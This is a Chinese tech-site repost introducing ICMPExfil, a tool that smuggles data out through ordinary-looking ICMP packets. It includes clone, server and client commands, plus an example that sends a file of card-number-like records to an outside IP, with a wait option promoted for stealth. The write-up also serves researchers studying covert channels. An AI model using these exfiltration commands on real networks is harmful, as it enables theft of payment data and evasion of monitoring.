服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

ICMPExfil:一款基于ICMP的数据提取和过滤工具

日期: 来源:FreeBuf收集编辑:Alpha_h4ck


 关于ICMPExfil 


ICMPExfil是一款基于ICMP的数据提取和过滤工具,该工具可以帮助广大研究人员通过有效的ICMP数据包传输数据。我们可以使用客户端脚本来传递希望过滤的数据,然后再通过目标设备将数据传递到运行的服务器上。无论你是经验丰富的安全专家,还是功能强大的安全系统,都只能查看到有效的ICMP数据包,数据包的数据结构没有任何的安全问题,我们的数据也不会隐藏在ICMP数据包中,因此通过审查数据包并不能够查看到我们所要提取或过滤的数据。


 工具下载 


由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好Python 3环境。


接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/martinoj2009/ICMPExfil.git
(向右滑动,查看更多)

 工具使用 

ASCII

该工具支持ASCII自负,我们可以过滤和提取任何使用ASCII自负表示的内容,例如字母和数字等。比如说,你使用了一个16位数字,那么你可以使用客户端脚本通过下列形式来将这16个数字传递给服务器:
./ping.py --ascii "4111111111111111"

发送给服务器

我们在设置服务器时,有两种选项,即--ip选项,或使用脚本中的ipToPing选项来设置默认IP。

等待时间

如果你想提升任务操作的隐蔽性,你还可以使用--wait参数来指定等待的时间。如果你有足够的耐心,你可以将这个时间设置得比较长,这样就更加难以被发现了。

Verbose模式

如果你想要查看详细的工具运行信息,可以使用--show选项。

服务器开启/关闭

我们只需要运行下列命令即可启动服务器:
sudo python3 server.py

服务器运行之后,它需要根据接收数据的来源来映射输入。

当你完成任务之后,直接按下Ctrl + C组合键即可终止工具运行。

 工具使用样例 

我已提前将一些16位数字存储到了一个名为file的文件中,接下来执行下列命令:
./ping.py --ip 1.2.3.4 --asciiFile file

file文件的内容如下:
4587965312457852 01/15 456 Martino Jones | 4567965382457452 03/16 236 Martino Joe
(向右滑动,查看更多)
编码后的数据如下:
['0110100', '0110101', '0111000', '0110111', '0111001', '0110110', '0110101', '0110011', '0110001', '0110010', '0110100', '0110101', '0110111', '0111000', '0110101', '0110010', '0100000', '0110000', '0110001', '0101111', '0110001', '0110101', '0100000', '0110100', '0110101', '0110110', '0100000', '1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1101110', '1100101', '1110011', '0100000', '1111100', '0100000', '0110100', '0110101', '0110110', '0110111', '0111001', '0110110', '0110101', '0110011', '0111000', '0110010', '0110100', '0110101', '0110111', '0110100', '0110101', '0110010', '0100000', '0110000', '0110011', '0101111', '0110001', '0110110', '0100000', '0110010', '0110011', '0110110', '0100000', '1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1100101', '0001010']
(向右滑动,查看更多)
服务器端计算偏移量:
Calculating offsets4 5 8 7 9 6 5 3 1 2 4 5 7 8 5 2   0 1 / 1 5   4 5 6   M a r t i n o   J o n e s   |   4 5 6 7 9 6 5 3 8 2 4 5 7 4 5 2   0 3 / 1 6   2 3 6   M a r t i n o   J o e
(向右滑动,查看更多)

 工具运行截图 


 许可证协议 

本项目的开发与发布遵循MIT开源许可证协议。

 项目地址 

ICMPExfil
https://github.com/martinoj2009/ICMPExfil

参考资料:
https://martinojones.com/
精彩推荐







        

        

      

    

    

      
    

    

       


    

    

       


    

    

      

        
文章推荐

      

      
      

    

    

       


    

    

       


    

    

      

        
相关阅读

      



        
    
          
  • 
            
    超好用的开源漫画/BD媒体服务器 - Komga
    
          
    • 
          
  • 
            
          
    • 
          
  • Komga 是一个免费开源的漫画、BD 媒体服务器,支持 REST API 和 OPDS,Komga 理论上适用于任何支持 OPDS 协议的阅读器。支持的文件格式包括:CBZ、CBR、PDF 和 epub 格式。Komga
    • 
        

        

      

        
        

      

        
        

      

        
        

      

        
        

      

        
        

      

        
        

      

        
        

      

        
        

      

        
        

      
    

    

       


    

    

       


    

    

      

        
聚合标签

      

      
     中国        自己的        美国        都是        疫情        的人        的是        亿元        三星        手机        华为        这款        车型        万元        企业        小米        日本        俄罗斯        民警        互联网     

      

    

  

  

    

      

        
热门文章

      

      

        


      

      

        


      

            

        
        

      

            

        
        

      

            

        
        

      

            

        
        

      

            

        
    
          
  • 
            
    “复活”半年后 京东拍拍二手杀入公益事业
    
          
    • 
          
  • 
            
          
    • 
          
  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。
  把“闲置品”变爱心
  6月12日,“益心一益·守护梦想每一步”2018年四
    • 
        

        

      

            

        
        

      

          

    

        


      

      

        


      

    

      

        
最新文章

      

            

        
    
          
  • 
            
    ICMPExfil:一款基于ICMP的数据提取和过滤工具
    
          
    • 
          
  • 
            
          
    • 
          
  •  关于ICMPExfil ICMPExfil是一款基于ICMP的数据提取和过滤工具,该工具可以帮助广大研究人员通过有效的ICMP数据包传输数据。我们可以使用客户端脚本来传递希望过滤的数据,然后
    • 
        

        

      

            

        
    
          
  • 
            
    存储芯片,16年来最惨
    
          
    • 
          
  • 
            
          
    • 
          
  • 根据统计,2022年下半年存储芯片销售量大减4成,除了产品卖不动以外,售价更是一季不如一季。故惨淡经营的状况,应该是从2006年都现在都没看过的。根据集邦科技(TrendForce)最新数据,
    • 
        

        

      

            

        
    
          
  • 
            
    小米 13 Pro拆解,具体供应商及所用IC型号
    
          
    • 
          
  • 
            
          
    • 
          
  • 小米13 Pro的屏幕采用三星6.73英寸3200x1440分辨率的OLED屏,型号为AMB673CP01。支持120Hz刷新率。后置模组三摄分别为:后置5000万像素主摄—Sony IMX989 f/1.9;5000万像素超广
    • 
        

        

      

            

        
        

      

            

        
        

      

            

        
    
          
  • 
            
    一文读懂ChatGPT 产业链
    
          
    • 
          
  • 
            
          
    • 
          
  • 报告正文分析师:陈杭 李佩京 姚天航 张建民联系人:安子超 叶光亮来源:浙商证券AI研究团队
    •